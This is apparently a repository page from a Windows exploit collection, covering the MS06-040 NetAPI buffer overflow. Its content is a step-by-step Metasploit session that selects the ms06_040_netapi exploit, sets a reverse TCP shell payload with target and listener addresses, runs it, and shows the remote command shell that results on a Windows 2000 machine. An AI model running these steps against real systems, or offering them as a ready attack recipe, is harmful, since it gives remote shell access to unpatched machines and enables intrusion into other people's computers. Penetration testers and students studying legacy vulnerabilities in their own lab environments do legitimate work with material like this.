Skip to content

Latest commit

 

History

History

MS06-040

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 

MS06-040

MS06-040

Vulnerability reference:

msf Usage

msf > search ms06_040
msf > use exploit/windows/smb/ms06_040_netapi
msf exploit(ms06_040_netapi) > show payloads 
msf exploit(ms06_040_netapi) > set payload windows/shell/reverse_tcp
msf exploit(ms06_040_netapi) > set RHOST 192.1.80.2 
msf exploit(ms06_040_netapi) > set LHOST 192.1.80.152 
msf exploit(ms06_040_netapi) > set TARGET 0TARGET -> 0
msf exploit(ms06_040_netapi) > exploit
session -i 1

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>

References